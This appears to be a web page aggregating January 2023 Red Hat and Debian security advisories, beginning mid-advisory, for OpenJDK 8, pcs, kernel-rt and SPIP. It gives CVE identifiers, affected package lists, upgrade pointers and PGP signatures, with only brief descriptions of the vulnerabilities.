java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-demo-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-demo-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-src-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-src-1.8.0.362.b08-1.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-21830  
https://access.redhat.com/security/cve/CVE-2023-21843  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY8+0P9zjgjWX9erEAQiO4A//QdKG0zEeh/mRYT/SKgMvYgoS9MPrG04/  
lcoDwPYqwPXXQNMM5sBlUUAAGc2vqWTy4zN7iOb7Kpsh6PwJZNV5vIYGTodiZ6CO  
SNYHrkohRJ02PFH8RVhMa07kzwOREesD7au0Aqr/IHjTRH2x0X1Twbmldbi16B+I  
iSMVI2mXVYYS8Ywf4ZZaTQ0gNIzk0kScitkQ05lhF0XBtnFyvcmYMgQe1AxzPotG  
sF/GgLLdqNXcxc/zGO/a1xut8/xXM5iNbHSK5LBT50P4LPNI4Me10wqEi7cy7a16  
vUvgvK9Ze57t0XdoP2qQ7+0nWsA/oKFsLd8yhesPc7ZfP+boEUpy6O7WV4ff7afj  
KJbD7K3Zcno/1O55S7VjGBytLwggBIFcBQimwGarxSroVsj0Qt0treQNGfNLctuh  
NgqrSGaxRKjSttG8vjghyJA4aPZEf1pZRkj0YZ7Tk88a74a0MrYZEF+eav17B+Of  
oFz6Qw6G/q6GpYusX04ti+YFf7EvFWuLqyA6DEJcOIoIsQQn+9esS002urBADj0v  
oIYM7juljFck+IwxshavxwF9saEECTYCJtdDRblfRmqe7cHEHBrzVGiMMXh35IGk  
pACfKV7IqS5rXBgeYL2x5VhhkEnHkY0F6dXytP5/hCqTkW4Lj+Y7cW9BjF+LuFll  
tEZVPSHt7AA=nr/N  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0203-01

Red Hat Security Advisory 2023-0395-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system.

Red Hat Security Advisory 2023-0395-01

Red Hat Security Advisory 2023-0393-01 - The pcs packages provide a command-line configuration system for the Pacemaker and Corosync utilities. Issues addressed include a file download vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: pcs security update  
Advisory ID:       RHSA-2023:0393-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0393  
Issue date:        2023-01-24  
CVE Names:         CVE-2022-45442  
====================================================================  
1. Summary:

An update for pcs is now available for Red Hat Enterprise Linux 8.2  
Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications  
Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux High Availability E4S (v. 8.2) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux High Availability TUS (v. 8.2) - aarch64, ppc64le, s390x, x86_64

3. Description:

The pcs packages provide a command-line configuration system for the  
Pacemaker and Corosync utilities.

Security Fix(es):

* sinatra: Reflected File Download attack (CVE-2022-45442)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2153363 - CVE-2022-45442 sinatra: Reflected File Download attack

6. Package List:

Red Hat Enterprise Linux High Availability E4S (v. 8.2):

Source:  
pcs-0.10.4-6.el8_2.4.src.rpm

aarch64:  
pcs-0.10.4-6.el8_2.4.aarch64.rpm  
pcs-snmp-0.10.4-6.el8_2.4.aarch64.rpm

ppc64le:  
pcs-0.10.4-6.el8_2.4.ppc64le.rpm  
pcs-snmp-0.10.4-6.el8_2.4.ppc64le.rpm

s390x:  
pcs-0.10.4-6.el8_2.4.s390x.rpm  
pcs-snmp-0.10.4-6.el8_2.4.s390x.rpm

x86_64:  
pcs-0.10.4-6.el8_2.4.x86_64.rpm  
pcs-snmp-0.10.4-6.el8_2.4.x86_64.rpm

Red Hat Enterprise Linux High Availability TUS (v. 8.2):

Source:  
pcs-0.10.4-6.el8_2.4.src.rpm

aarch64:  
pcs-0.10.4-6.el8_2.4.aarch64.rpm  
pcs-snmp-0.10.4-6.el8_2.4.aarch64.rpm

ppc64le:  
pcs-0.10.4-6.el8_2.4.ppc64le.rpm  
pcs-snmp-0.10.4-6.el8_2.4.ppc64le.rpm

s390x:  
pcs-0.10.4-6.el8_2.4.s390x.rpm  
pcs-snmp-0.10.4-6.el8_2.4.s390x.rpm

x86_64:  
pcs-0.10.4-6.el8_2.4.x86_64.rpm  
pcs-snmp-0.10.4-6.el8_2.4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-45442  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY8+0PNzjgjWX9erEAQgNkA//edHjahjCaKOYb3cR/ahSnNXjhhl/x4nM  
lX18WSd2PpJ1KvUbVBXo2BL0jlfDBwTpFvdJmzTcxjrEM10i0B84c4DJDJfmcdI0  
CWnh85UpwUpTGvqhxUpf8EWDNh6yrLrdDh1RjBc765/Ldy4ai67cqoCv2FzkCBRo  
sPtPQBLt6eVME/39tarbX3mwN6JUGPEiXmSkKv2KqN+Jf4kLzLjrs4Cj0/V0WXrW  
MZwMnVnfKqL+XerOCincbCvwfNByfN0seVj9wIkOaAu+Zz4YASXzZl8wtbkN3Gr5  
UV0vZ68MegZPTLsvre+inn2DIQfBOH1xxN352Vz1q3lBu2TnyC/mC0Leun2lK7bY  
rbG7pz3piN4xOZNvOcPl0id0d6DMauDdZnNv9kF/A7K9EbqooMaR/H1I3CgsqIuo  
p3Mvrfx7GuLFUyGNkUMV5Gkm9Gdc64JLXFVA3kqTitp36dr2APx//D5KDbAZfWG3  
fnTJgIRovcE0+/dt6RfFkFDufBh7vKYJLIf/2+GBKnDjTEXzjus627VSBXx3Z2wM  
4fWCZe7YfYvQY0lxQMOKIXC1l5T+9LFgOnl7FcsgU/krR17pwU0zRBKOdKC8SsPa  
R1Lz0b/NKPh6ABykjKyoI/irdnp8Xy8M++98UsQHkI4oMvebl/nsx5BAjlzanBSZ  
FhiArI4ug2Y=YPWO  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0393-01

Red Hat Security Advisory 2023-0392-01 - The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: kernel-rt security and bug fix update  
Advisory ID:       RHSA-2023:0392-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0392  
Issue date:        2023-01-24  
CVE Names:         CVE-2022-2964  
====================================================================  
1. Summary:

An update for kernel-rt is now available for Red Hat Enterprise Linux 8.2  
Telecommunications Update Service.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Real Time TUS (v. 8.2) - x86_64  
Red Hat Enterprise Linux Real Time for NFV TUS (v. 8.2) - x86_64

3. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables  
fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: memory corruption in AX88179_178A based USB ethernet device.  
(CVE-2022-2964)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* kernel-rt: update RT source tree to the latest RHEL-8.2.z23 Batch  
(BZ#2150054)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2067482 - CVE-2022-2964 kernel: memory corruption in AX88179_178A based USB ethernet device.

6. Package List:

Red Hat Enterprise Linux Real Time for NFV TUS (v. 8.2):

Source:  
kernel-rt-4.18.0-193.98.1.rt13.149.el8_2.src.rpm

x86_64:  
kernel-rt-4.18.0-193.98.1.rt13.149.el8_2.x86_64.rpm  
kernel-rt-core-4.18.0-193.98.1.rt13.149.el8_2.x86_64.rpm  
kernel-rt-debug-4.18.0-193.98.1.rt13.149.el8_2.x86_64.rpm  
kernel-rt-debug-core-4.18.0-193.98.1.rt13.149.el8_2.x86_64.rpm  
kernel-rt-debug-debuginfo-4.18.0-193.98.1.rt13.149.el8_2.x86_64.rpm  
kernel-rt-debug-devel-4.18.0-193.98.1.rt13.149.el8_2.x86_64.rpm  
kernel-rt-debug-kvm-4.18.0-193.98.1.rt13.149.el8_2.x86_64.rpm  
kernel-rt-debug-modules-4.18.0-193.98.1.rt13.149.el8_2.x86_64.rpm  
kernel-rt-debug-modules-extra-4.18.0-193.98.1.rt13.149.el8_2.x86_64.rpm  
kernel-rt-debuginfo-4.18.0-193.98.1.rt13.149.el8_2.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-4.18.0-193.98.1.rt13.149.el8_2.x86_64.rpm  
kernel-rt-devel-4.18.0-193.98.1.rt13.149.el8_2.x86_64.rpm  
kernel-rt-kvm-4.18.0-193.98.1.rt13.149.el8_2.x86_64.rpm  
kernel-rt-modules-4.18.0-193.98.1.rt13.149.el8_2.x86_64.rpm  
kernel-rt-modules-extra-4.18.0-193.98.1.rt13.149.el8_2.x86_64.rpm

Red Hat Enterprise Linux Real Time TUS (v. 8.2):

Source:  
kernel-rt-4.18.0-193.98.1.rt13.149.el8_2.src.rpm

x86_64:  
kernel-rt-4.18.0-193.98.1.rt13.149.el8_2.x86_64.rpm  
kernel-rt-core-4.18.0-193.98.1.rt13.149.el8_2.x86_64.rpm  
kernel-rt-debug-4.18.0-193.98.1.rt13.149.el8_2.x86_64.rpm  
kernel-rt-debug-core-4.18.0-193.98.1.rt13.149.el8_2.x86_64.rpm  
kernel-rt-debug-debuginfo-4.18.0-193.98.1.rt13.149.el8_2.x86_64.rpm  
kernel-rt-debug-devel-4.18.0-193.98.1.rt13.149.el8_2.x86_64.rpm  
kernel-rt-debug-modules-4.18.0-193.98.1.rt13.149.el8_2.x86_64.rpm  
kernel-rt-debug-modules-extra-4.18.0-193.98.1.rt13.149.el8_2.x86_64.rpm  
kernel-rt-debuginfo-4.18.0-193.98.1.rt13.149.el8_2.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-4.18.0-193.98.1.rt13.149.el8_2.x86_64.rpm  
kernel-rt-devel-4.18.0-193.98.1.rt13.149.el8_2.x86_64.rpm  
kernel-rt-modules-4.18.0-193.98.1.rt13.149.el8_2.x86_64.rpm  
kernel-rt-modules-extra-4.18.0-193.98.1.rt13.149.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2964  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY8+0MdzjgjWX9erEAQgYNg/+Ipq5YS9wIOgpCHH0axNZfwlj0alPuDJ0  
pVF0ybrNBP8cZmMSY5b/Duh6YCVI2bK0rk6JpHgIYZR9PfidY3jfoU4g57fSylD9  
rHCcvn6siPf/kUuMKrLQsck+AHZiN89+6kMQ1KEaswCAglvzSlY3ezTPiT6sVRO9  
6rcbDALmqVP8VI4L/5KkmarEBBtXVZDr33kynclP4Urlo1PlYsdj84WtFlJ+NZ7A  
zUxr9SQ3f55nWzM4SbJ6i1W+Or3G8W1Yw198TzldWF3hhvDQ2nVtRLJKKtS5idse  
r8Jk+NFYAMHPRM3HhVZrSaJAhw7KvrxswEhuH+up9j8ev55vBPEnWSCBZ0Jckwkl  
uopPd6yodQN+zzOOFCHsJZrGWyk93tVLRqvv6cx/qucI27EE80sIAqydXZP1AeXs  
aBRRL+AuVmud1R9iBZ17aKgklxLbIUmLEHfWgFktyy+Rb19qUUn1jyiUond8tHUT  
Sb4u1sB21UrOE/N8M6dd+xcZ8d2qnnJbb0I0XoK7uVNb/afCSzvAzCMJJRbbqSn7  
orKkqvJdY/5TSWO0PefN1+XP9IwXsT5UIolALzN8ct5vEhLvOfQUa9ULQroFSJyC  
F4IPeOu/c/mR1wOqRUcK2p9bVGQpZB5doVBhPpBr5LL9WjYV0GhnkLuhkYQ5+0OR  
OU0B0JMMVHc=Idrx  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0392-01

Debian Linux Security Advisory 5325-1 - It was discovered that SPIP, a website engine for publishing, would allow a malicious user to SQL injection attacks, or bypass authorization access.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5325-1                   security@debian.orghttps://www.debian.org/security/                       Sebastien DelafondJanuary 24, 2023                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : spipIt was discovered that SPIP, a website engine for publishing, wouldallow a malicious user to SQL injection attacks, or bypassauthorization access.For the stable distribution (bullseye), this problem has been fixed inversion 3.2.11-3+deb11u6.We recommend that you upgrade your spip packages.For the detailed security status of spip please refer toits security tracker page at:https://security-tracker.debian.org/tracker/spipFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCgAdFiEEAqSkbVtrXP4xJMh3EL6Jg/PVnWQFAmPPpdYACgkQEL6Jg/PVnWT7GQgAgemz9C/cvulSLwEuV38WAaZwy8RFC3CGw3DirFLf2tVeC6KDI+tGs/u4XSY7M45xEr4y1TR3NMfovrnX6iR/JgPU/3ZJsFquq8O5Z9WCeZFe2YCkmuqP9hQvtxXfOoL4c9b1hfgtv4nVcqLyCFFJhfqLiAy8Eb18vzuggjLVYKa1kioa8wAGk/YBB9rvoKNN1bBfow7A7704Gk2bJMfcxIC9P4anHm6u0OZ4HgC0GYpVYZXegfrFICs7fylqgcg6Ub+HH+6e3wEDN1oqnj0IQDy09lFj4kCT5xQjhQM8oMZChExndWdmRRI2iEmUN/gg7RVhdUfNvv8VTy1lo+wd4g==XA3L-----END PGP SIGNATURE-----

Debian Security Advisory 5325-1

Red Hat Security Advisory 2023-0387-01 - The OpenJDK 8 packages provide the OpenJDK 8 Java Runtime Environment and the OpenJDK 8 Java Software Development Kit. This release of the Red Hat build of OpenJDK 8 for portable Linux serves as a replacement for Red Hat build of OpenJDK 8 and includes security and bug fixes as well as enhancements. For further information, refer to the release notes linked to in the References section. Issues addressed include a deserialization vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: OpenJDK 8u362 Security Update for Portable Linux Builds  
Advisory ID:       RHSA-2023:0387-01  
Product:           OpenJDK  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0387  
Issue date:        2023-01-23  
CVE Names:         CVE-2023-21830 CVE-2023-21843  
====================================================================  
1. Summary:

The Red Hat build of OpenJDK 8 (java-1.8.0-openjdk) is now available for  
portable Linux.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

The OpenJDK 8 packages provide the OpenJDK 8 Java Runtime Environment and  
the OpenJDK 8 Java Software Development Kit.

This release of the Red Hat build of OpenJDK 8 (8u362) for portable Linux  
serves as a replacement for Red Hat build of OpenJDK 8 (8u352) and includes  
security and bug fixes as well as enhancements. For further information,  
refer to the release notes linked to in the References section.

Security Fix(es):

* OpenJDK: soundbank URL remote loading (CVE-2023-21843)

* OpenJDK: improper restrictions in CORBA deserialization (CVE-2023-21830)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2160475 - CVE-2023-21843 OpenJDK: soundbank URL remote loading (Sound, 8293742)  
2160490 - CVE-2023-21830 OpenJDK: improper restrictions in CORBA deserialization (Serialization, 8285021)

5. References:

https://access.redhat.com/security/cve/CVE-2023-21830  
https://access.redhat.com/security/cve/CVE-2023-21843  
https://access.redhat.com/security/updates/classification/#moderate

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY89f3NzjgjWX9erEAQh35hAAkeXwAdEFfIoC7VcMIlyrh3MmHUnC6pjv  
n975hBraglQ+KCQpLzdlfLKN86VnLo/Q5oS2m6E59qaAmbCA2teMiK71UEVhXRjx  
NxuJpLAEqbjmNiKAHASCxnzTwJskcpKdyoQTCGg+i6muh2ZK++pYGj4WuX/x+OGe  
RlDFV8NnvBukW6FqhCayEzpiiROC3dyN8nC5neHxQqcB6VEN4QF3wsEpQ/VaPrT4  
GtmAVF5PCzdjaJtBHJGHYLVJ+lwffx2LlaVAb+Nj/lciVPiBMXd66Ll0aHFtNFCA  
n/B95VGlW+oibJ74tGls0yjA8QdW99YoNmeLatQmv0h91UtOIIkUJ3dBRA7nOpPx  
EZM+/rFCZKCFIj44PbE2wZ4Y6YVilntSkQfT9XDlVARrAPLtJg8nmoQMLzW26bKa  
R2CZdDH0xE4GlrczPNRn9nYp7QP2T642/t47lq9pdquR6fwdte4kL9A1Jvsvq0aq  
sGCdEi2UsP+26YcLJX3w27r/VqSaEL0QZ94ott7Oo3Edb/mcHPNujQ35ALhcoSn+  
dveedRs5Lv8Di/5U8y6fhZtmZ+CxgaYLfH3iNOzDRg4Vfr9k3Pio4f0/i7JHn5Se  
3UwILlk9BNNETpPvDy2IJTUzPkjpvMYeh5Yv1RzjxaNzmZA5efSe/Wrn2u2fdviK  
PUxM2Ermgz4ðaN  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#linux